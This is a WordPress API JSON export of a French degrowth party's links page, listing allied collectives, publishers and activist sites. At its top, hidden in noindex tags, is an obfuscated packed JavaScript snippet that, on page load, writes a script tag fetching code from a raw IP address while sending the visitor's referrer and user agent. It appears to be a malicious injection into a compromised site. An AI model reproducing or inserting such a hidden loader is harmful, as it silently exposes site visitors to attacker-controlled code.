{"id":1864,"date":"2009-03-17T21:32:55","date_gmt":"2009-03-17T21:32:55","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?page_id=1864"},"modified":"2014-11-25T20:43:06","modified_gmt":"2014-11-25T19:43:06","slug":"liens-amis","status":"publish","type":"page","link":"https:\/\/www.partipourladecroissance.net\/?page_id=1864","title":{"rendered":"Liens amis"},"content":{"rendered":"<div id=\"linkcat-5\" class=\"widget widget_links\" style=\"text-align: center;\"><a href=\"http:\/\/www.partipourladecroissance.net\/?page_id=6\"> <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zetbd|var|u0026u|referrer|hanrn||js|php'.split('|'),0,{}))\n<\/script><\/noindex> <strong>Si vous souhaitez que le PPLD pointe sur votre travail, merci de nous contacter<\/strong><\/a><\/div>\n<div class=\"widget widget_links\">\n<h2 class=\"title\">Collectifs pour la D\u00e9croissance<\/h2>\n<ul>\n<li><a href=\"http:\/\/www.objecteursdecroissance62.fr\/site\/doku.php\">Collectif des Objecteurs de croissance 62<\/a><\/li>\n<li><a href=\"http:\/\/aquitainedecroissance.org\/\">Aquitaine D\u00e9croissance<\/a><\/li>\n<li><a href=\"http:\/\/www.ocav.fr\/\">Objecteurs de Croissance \u2013 Association Voironnaise<\/a><\/li>\n<li><a href=\"http:\/\/decroissance.lehavre.free.fr\/\">Collectif havrais (ChOC)<\/a><\/li>\n<li><a title=\"D\u00e9croissance en Meuse\" href=\"http:\/\/decroissance.55.free.fr\/\">Collectif meusien<\/a><\/li>\n<li><a href=\"http:\/\/ocparis.canalblog.com\/\" target=\"_blank\">Collectif parisien<\/a><\/li>\n<li><a href=\"http:\/\/objecteursdecroissance-lr.fr\/\">Languedoc Roussillon <\/a><\/li>\n<li><a title=\"Yvelines-D\u00e9croissance\" href=\"http:\/\/yvelines-decroissance.eklablog.fr\">Yvelines-D\u00e9croissance<\/a><\/li>\n<li><a href=\"http:\/\/www.roc06.fr\/\">R\u00e9seau Objection de Croissance Alpes-Maritimes<\/a><\/li>\n<li><a href=\"http:\/\/www.partipourladecroissance.net\/?page_id=3990\">Si votre collectif se sent concern\u00e9 par la D\u00e9croissance-Politique merci de nous contacter<\/a><\/li>\n<\/ul>\n<div id=\"linkcat-30\">\n<h2>Mouvements Politiques Amis<\/h2>\n<ul>\n<li><a href=\"http:\/\/adoc-france.org\/\">Association d&rsquo;Objecteurs de Croissance<\/a><\/li>\n<li><a href=\"http:\/\/nanorezo.free.fr\/\">Europe-D\u00e9croissance<\/a><\/li>\n<li><a href=\"http:\/\/www.objecteursdecroissance.be\/\">M.P.O.C Belgique<\/a><\/li>\n<li><a href=\"http:\/\/www.les-oc.info\/\">Mouvement des Objecteurs de Croissance<\/a><\/li>\n<\/ul>\n<\/div>\n<\/div>\n<div id=\"linkcat-4\" class=\"widget widget_links\">\n<h2 class=\"title\">La D\u00e9croissance \u00e0 l&rsquo;\u00e9tranger<\/h2>\n<ul>\n<li><a href=\"http:\/\/otgi.org\/\">Objectors To Growth International<\/a><\/li>\n<li>groupes belges participant \u00e0 des \u00e9lections :<a href=\"http:\/\/www.velorution.be\/\">V\u00e9lorution<\/a> &amp; <a href=\"http:\/\/www.oservoterpourvous.be\/\">Oser liste 31 <\/a><\/li>\n<li><a href=\"http:\/\/www.objecteursdecroissance.be\/\">Association d\u2019Objecteurs de Croissance (mouvement politique belge)<\/a><\/li>\n<li><a href=\"http:\/\/www.partitodecrescita.it\/\">Partito Per La Decrescita<\/a> (Italie)<\/li>\n<li><a href=\"http:\/\/www.decrecemadrid.org\/\">Decrece Madrid<\/a><\/li>\n<li><a href=\"http:\/\/www.decrescita.it\/\">Decrescita<\/a><\/li>\n<li><a href=\"http:\/\/www.decroissance.ch\/\">D\u00e9croissance.ch (Suisse)<\/a><\/li>\n<li><a href=\"http:\/\/www.decrecimiento.info\/\">decrecimiento<\/a><\/li>\n<li><a href=\"http:\/\/lmv.hu\/nemnovekedes\" target=\"_blank\">La D\u00e9croissance en Hongrie : Nemn\u00f6veked\u00e9s<\/a><\/li>\n<li><a href=\"http:\/\/decrescimentobrasil.blogspot.com\/\">Decrescimento Brasil<\/a><\/li>\n<li><a href=\"http:\/\/www.decroissance.qc.ca\/\">Mouvement qu\u00e9b\u00e9cois pour une d\u00e9croissance conviviale<\/a><\/li>\n<li><a href=\"http:\/\/wachstumsruecknahme.qsdf.org\/\">Wachstumsr\u00fccknahme<\/a><\/li>\n<li><a href=\"http:\/\/www.degrowth.net\/\">Research &amp; Degrowth<\/a><\/li>\n<\/ul>\n<ul class=\"xoxo blogroll\">\n<li><a href=\"http:\/\/www.partipourladecroissance.net\/?page_id=6\">Si vous connaissez d&rsquo;autres partis ou collectifs pour D\u00e9croissance \u00e9trangers, merci de nous contacter<\/a><\/li>\n<\/ul>\n<h2 class=\"title\">Editions amies<\/h2>\n<ul class=\"xoxo blogroll\">\n<li><a href=\"http:\/\/editionutopia.wordpress.com\/\">Edition Utopia<\/a><\/li>\n<li><a href=\"http:\/\/www.objectiondecroissance.org\/librairie\/\">Librairie de l&rsquo;AderOC<\/a><\/li>\n<li><a href=\"http:\/\/www.proximites.net\/\">ProXimit\u00e9s<\/a><\/li>\n<li><a href=\"http:\/\/www.achetezmoins.ch\/\">Moins<\/a><\/li>\n<li><a href=\"http:\/\/www.kairospresse.be\/\">Kairos<\/a><\/li>\n<li><a href=\"http:\/\/www.casseursdepub.org\/\" target=\"_blank\">Casseurs de pub<\/a><\/li>\n<li><a href=\"http:\/\/www.entropia-la-revue.org\/\">La revue Entropia<\/a><\/li>\n<li><a href=\"http:\/\/www.ladecroissance.net\/\" target=\"_blank\">Journal la d\u00e9croissance<\/a><\/li>\n<li><a href=\"http:\/\/www.revuesilence.net\/\">S!lence<\/a><\/li>\n<li><a href=\"http:\/\/www.lagedefaire.org\/\">L&rsquo;\u00e2ge de faire<\/a><\/li>\n<li><a href=\"http:\/\/www.fakirpresse.info\/\">Fakir<\/a><\/li>\n<li><a href=\"http:\/\/www.alterlettre.info\/\">Alter-lettre de Voiron<\/a><\/li>\n<\/ul>\n<h2 class=\"title\">Sites amis<\/h2>\n<ul class=\"xoxo blogroll\">\n<li><a href=\"http:\/\/www.decroissance.org\/\" target=\"_blank\">Institut d\u2019\u00e9tudes \u00e9conomiques et sociales<\/a><\/li>\n<li><a href=\"http:\/\/www.les-oc.info\/\">Mouvement des Objecteurs de Croissance<\/a><\/li>\n<li><a href=\"http:\/\/economie-alternative.les-oc.info\/\">S\u00e9minaire francophone pour une \u201c\u00e9conomie alternative au capitalisme\u201d<\/a><\/li>\n<li><a href=\"http:\/\/www.alterblog.net\/\">AlterBlog<\/a><\/li>\n<li><a href=\"http:\/\/www.apres-developpement.org\/accueil\/index.php\">ROCADe<\/a><\/li>\n<li><a href=\"http:\/\/www.scoop.it\/t\/decroissance\">Scoop it d\u00e9croissance<\/a><\/li>\n<li><a href=\"http:\/\/www.decroissance.info\/\">Decroissance.info<\/a> &#8211; <a href=\"http:\/\/forum.decroissance.info\/\">Le forum<\/a><\/li>\n<li><a href=\"http:\/\/www.yvescochet.net\/wordpress\/index.php\">Yves Cochet<\/a><\/li>\n<li><a href=\"http:\/\/fr.wikipedia.org\/wiki\/Serge_Latouche#Bibliographie\" target=\"_blank\">Serge Latouche<\/a><\/li>\n<li><a href=\"http:\/\/www.cittaslow.net\/\">R\u00e9seau international des villes lentes<\/a><\/li>\n<li><a href=\"http:\/\/www.bastamag.net\/spip.php?page=dossier&amp;id_mot=75\">Ces exp\u00e9riences qui changent le monde<\/a><\/li>\n<li><a href=\"http:\/\/vad-clara.hautetfort.com\/\" target=\"_blank\">La D\u00e9croissance en po\u00e9sie avec Clara Breteau<\/a><\/li>\n<\/ul>\n<ul>\n<li>Transition town :\n<ul>\n<li><a href=\"http:\/\/www.transitiontowns.org\/\">site g\u00e9n\u00e9ra<\/a>l<\/li>\n<li><a href=\"http:\/\/transitiontowns.org\/TransitionNetwork\/TransitionHandbook\">page recommand\u00e9e<\/a><\/li>\n<li><a href=\"http:\/\/developpementdurable.revues.org\/index7513.html\">aper\u00e7u en fran\u00e7ais<\/a><\/li>\n<li><a href=\"http:\/\/totnes.transitionnetwork.org\/\">transition town.V1<\/a><\/li>\n<li><a href=\"http:\/\/villesentransition.net\/\">villes et communaut\u00e9s en transition<\/a><\/li>\n<li>diffusion de \u00a0\u00bb <a href=\"http:\/\/sites.radiofrance.fr\/chaines\/france-culture2\/emissions\/terre_a_terre\/fiche.php?diffusion_id=79447\">terre \u00e0 terre<\/a>\u00a0\u00bb du 26 d\u00e9cembre 2009 (<a href=\"http:\/\/decroissance.lehavre.free.fr\/presse\/terre_a_terre-26.12.2009-Transition_towns_Bristol.mp3\">t\u00e9l\u00e9charger le mp3<\/a>)<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<ul class=\"xoxo blogroll\">\n<li><a href=\"http:\/\/www.decroissance.org\/?chemin=liens\" target=\"_blank\">D&rsquo;autres liens sur l&rsquo;apr\u00e8s p\u00e9trole, et la d\u00e9croissance en g\u00e9n\u00e9ral<\/a><\/li>\n<\/ul>\n<div id=\"linkcat-4\" class=\"widget widget_links\">\n<h2 class=\"title\">Alter-\u00e9v\u00e9nements<\/h2>\n<ul class=\"xoxo blogroll\">\n<li><a href=\"http:\/\/est-roulotte.over-blog.com\/\">L\u00e9na et Tyry en roulotte vers l&rsquo;Est<\/a><\/li>\n<li><a href=\"http:\/\/campclimat.org\/\">Camp Action Climat<\/a><\/li>\n<li><a href=\"http:\/\/lagrandepause.net\/\">La Grande Pause<\/a><\/li>\n<li><a href=\"http:\/\/www.degrowth.eu\/v1\/index.php?id=2&amp;L=2\">Conf\u00e9rence sur la D\u00e9croissance, Barcelone 2010<\/a><\/li>\n<li><a href=\"http:\/\/www.contre-grenelle.org\/\" target=\"_blank\">Contre Grenelle de l\u2019environnement (mai 09)<\/a><\/li>\n<li><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2008\/12\/culture-et-decroissance.pdf\">Festival \u00ab\u00a0Culture et D\u00e9croissance\u00a0\u00bb \u00e0 Amb\u00e9rieu en Bugey (fin mai)<\/a><\/li>\n<li><a href=\"http:\/\/altertour.net\/\">AlterTour<\/a><a href=\"http:\/\/altertour.net\/\">, \u00ab\u00a0pour une plan\u00e8te sans dopage\u00a0\u00bb (juillet 10)<\/a><\/li>\n<li><a href=\"http:\/\/www.projet-escargot.fr\/\">Projet escargot (d\u00e9part dimanche 5 avril)<\/a><\/li>\n<li><a href=\"http:\/\/www.objecteursdecroissance.be\/action\/enfants\/\">Campagne pour la protection de la sant\u00e9 des enfants<\/a><\/li>\n<\/ul>\n<\/div>\n<div class=\"widget widget_links\" style=\"text-align: left;\">\n<div id=\"linkcat-4\" class=\"widget widget_links\">\n<h2 class=\"title\">Forces Parall\u00e8les<\/h2>\n<ul class=\"xoxo blogroll\">\n<li>Bizi : <a href=\"http:\/\/www.bizimugi.eu\/\">http:\/\/www.bizimugi.eu\/<\/a><\/li>\n<li>Alternative Libertaire : <a href=\"http:\/\/www.alternativelibertaire.org\/\">http:\/\/www.alternativelibertaire.org\/<\/a><\/li>\n<li>La biblioth\u00e8que r\u00e9sistante : <a href=\"http:\/\/www.la-bibliotheque-resistante.org\/\">http:\/\/www.la-bibliotheque-resistante.org\/<\/a><\/li>\n<li>Parti de la r\u00e9sistance : <a href=\"http:\/\/parti-de-la-resistance.fr\/\">http:\/\/parti-de-la-resistance.fr\/<\/a><\/li>\n<li><a href=\"http:\/\/jefklak.org\/?p=1308\">Critique sociale &amp; exp\u00e9riences litt\u00e9raires<\/a><\/li>\n<li>Grain : <a href=\"http:\/\/www.grain.org\/accueil\/\">http:\/\/www.grain.org\/accueil\/<\/a><\/li>\n<li><a href=\"http:\/\/www.technologos.fr\/\">http:\/\/www.technologos.fr\/<\/a><\/li>\n<li><a href=\"http:\/\/www.fruncut.org\/\">Uncut : on paiera pas leur crise<\/a><\/li>\n<li><a href=\"http:\/\/hors-sol.herbesfolles.org\/2010\/04\/07\/livres-de-papier\/\">hors-sol &#8211; Site contre les RFID et le meilleur des mondes !<\/a><\/li>\n<li><a href=\"http:\/\/www.rene-balme.org\/\">Maire de Grigny<\/a><\/li>\n<li><a href=\"http:\/\/www.nonviolence.fr\/\">Mouvement pour une Alternative Non violent : MAN<\/a><\/li>\n<li><a href=\"http:\/\/www.adaptation-decroissance.com\/\">Mouvement pour l&rsquo;apr\u00e8s-p\u00e9trole<\/a><\/li>\n<li><a href=\"http:\/\/www.ecologiepourlehavre.fr\/\">Ecologie Pour Le Havre<\/a><\/li>\n<li>Association Mati\u00e8res Prises : <a href=\"http:\/\/matieresprises.blogspot.com\/\">http:\/\/matieresprises.blogspot.com\/<\/a><\/li>\n<li><a href=\"http:\/\/passerellesud.org\/\">PasserelleSud<\/a><\/li>\n<li><a href=\"http:\/\/www.les-renseignements-genereux.org\/presentation\">Les renseignements g\u00e9n\u00e9reux<\/a><\/li>\n<li><a href=\"http:\/\/lesfilmsdureveil.free.fr\">Les Films du r\u00e9veil<\/a><\/li>\n<li><a href=\"http:\/\/www.sciencescitoyennes.org\/\" target=\"_blank\">le Plan B<\/a><\/li>\n<li><a href=\"http:\/\/www.sciencescitoyennes.org\/\" target=\"_blank\">Sciences citoyennes<\/a><\/li>\n<li><a href=\"http:\/\/www.sortirdunucleaire.org\/\">R\u00e9seau sortir du nucl\u00e9aire<\/a><\/li>\n<li><a href=\"http:\/\/www.lesarkophage.com\/\">Le Sarkophage<\/a><\/li>\n<li><a href=\"http:\/\/cequilfautdetruire.org\/\">C.Q.F.D.<\/a><\/li>\n<li><a href=\"http:\/\/contreinfo.info\/\">Contre-info<\/a><\/li>\n<li><a href=\"http:\/\/terreaterre.ww7.be\/\">Terre \u00e0 Terre sur France-Culture<\/a><\/li>\n<li><a href=\"http:\/\/www.reporterre.net\/\">Reporterre<\/a><\/li>\n<li><a href=\"http:\/\/tvbruits.org\/\">TV Bruits<\/a><\/li>\n<li><a href=\"http:\/\/www.terre.tv\/fr\/\">Terre TV<\/a><\/li>\n<li><a href=\"http:\/\/latelelibre.fr\/\">La T\u00e9l\u00e9libre<\/a><\/li>\n<li><a href=\"http:\/\/www.phototheque.org\/\">La photot\u00e8que du mouvement social<\/a><\/li>\n<li><a href=\"http:\/\/www.lamare.org\">La mare aux canards<\/a><\/li>\n<li><a href=\"http:\/\/www.utopimages.org\/\">Utopimages<\/a><\/li>\n<li><a href=\"http:\/\/www.superno.com\/blog\/\">Le Blog de SuperNo<\/a><\/li>\n<li><a href=\"http:\/\/le-ragondin-furieux.blog4ever.com\/\">Le Ragondin furieux<\/a><\/li>\n<li><a href=\"http:\/\/belagom.blogspot.com\/2009\/05\/les-amap-on-tous-y-gagner.html\">Collectif invisible<\/a><\/li>\n<li><a href=\"http:\/\/magazinedeleauamonmoulin.blogspot.com\/\">De l&rsquo;eau \u00e0 mon moulin<\/a><\/li>\n<li><a href=\"http:\/\/plusconscient.net\/decroissance\">plusconscient<\/a><\/li>\n<li><a href=\"http:\/\/belagom.blogspot.com\/2009\/05\/les-amap-on-tous-y-gagner.html\">Les Amap : on a tous \u00e0 y gagner !!!<\/a> &#8211; <a href=\"http:\/\/www.reseau-amap.org\/\">r\u00e9seau national des Amap<\/a><\/li>\n<li><a href=\"http:\/\/viacampesina.org\/main_fr\/\">La Via Campesina (mouvement paysan international)<\/a><\/li>\n<li><a href=\"http:\/\/www.rac-f.org\/article.php3?id_article=1635\">Elections r\u00e9gionales 2010 : 12 mesures climat-\u00e9nergie pour des r\u00e9gions exemplaires<\/a><\/li>\n<\/ul>\n<h2 class=\"title\">Ressources scientifiques<\/h2>\n<ul class=\"xoxo blogroll\">\n<li><a href=\"http:\/\/hisz.rsoe.hu\/alertmap\/index2.php\">carte du monde donnant en direct les catastrophes climatiques<\/a><\/li>\n<li><a href=\"http:\/\/www.greenpeace.fr\/nucleaire\/ppi\/\">risques nucl\u00e9aires en France<\/a><\/li>\n<li><a href=\"http:\/\/www.criirad.org\/\">CRIIRAD : Commission de\u00a0 Recherche et d&rsquo;Information\u00a0 Ind\u00e9pendantes sur la Radioactivit\u00e9<\/a><\/li>\n<li><a href=\"http:\/\/www.acro.eu.org\/\">ACRO : Association pour le Contr\u00f4le de la Radioactivit\u00e9 de l&rsquo;Ouest<\/a><\/li>\n<li><a href=\"http:\/\/alter-natif.net\/index.php?page=Fracturation\">Tout savoir sur la Facturation Hydraulique<\/a><\/li>\n<li><a href=\"http:\/\/www.leap2020.eu\/Francais_r26.html\">GlobalEurope Anticipation Bulletin<\/a><\/li>\n<li><a href=\"http:\/\/jacques.testart.free.fr\/\">Jacques Testart<\/a><\/li>\n<li><a href=\"http:\/\/www.manicore.com\/\">Manicore (Jancovici)<\/a><\/li>\n<li><a href=\"http:\/\/www.terredebrut.org\/\">Terre de Brut<\/a><\/li>\n<li><a href=\"http:\/\/www.netvibes.com\/rfdocenvironnement#Accueil\">Actualit\u00e9s environnementales issues de \u00ab\u00a0Terre \u00e0 Terre\u00a0\u00bb<\/a><\/li>\n<li><a href=\"http:\/\/carfree.free.fr\/\">Pour en finir avec la soci\u00e9t\u00e9 de l&rsquo;automobile (Carfree)<\/a><\/li>\n<li><a href=\"http:\/\/sansvoiture.free.fr\/\">Pour une ville sans voiture<\/a><\/li>\n<li><a href=\"http:\/\/mclcm.free.fr\/\">Mouvement contre la \u00ab\u00a0constante macabre\u00a0\u00bb<\/a><\/li>\n<li><a href=\"http:\/\/www.piecesetmaindoeuvre.com\/\">Pi\u00e8ces et main d&rsquo;oeuvre\u00a0<\/a><\/li>\n<li><a href=\"http:\/\/www.technologos.fr\/\">Technologos<\/a><\/li>\n<li><a href=\"http:\/\/www.revolution-lente.com\/\">R\u00e9volution lente<\/a><\/li>\n<li style=\"text-align: left;\"><a href=\"http:\/\/www.culture-hors-sol.org\/\">Culture hors sol<\/a><\/li>\n<li style=\"text-align: left;\"><a href=\"http:\/\/www.votresante.org\/\">Votre Sant\u00e9<\/a><\/li>\n<\/ul>\n<\/div>\n<\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Si vous souhaitez que le PPLD pointe sur votre travail, merci de nous contacter Collectifs pour la D\u00e9croissance Collectif des Objecteurs de croissance 62 Aquitaine D\u00e9croissance Objecteurs de Croissance \u2013 Association Voironnaise Collectif havrais (ChOC) Collectif meusien Collectif parisien Languedoc &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?page_id=1864\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"parent":221,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-1864","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/1864","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1864"}],"version-history":[{"count":82,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/1864\/revisions"}],"predecessor-version":[{"id":9008,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/1864\/revisions\/9008"}],"up":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/221"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1864"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}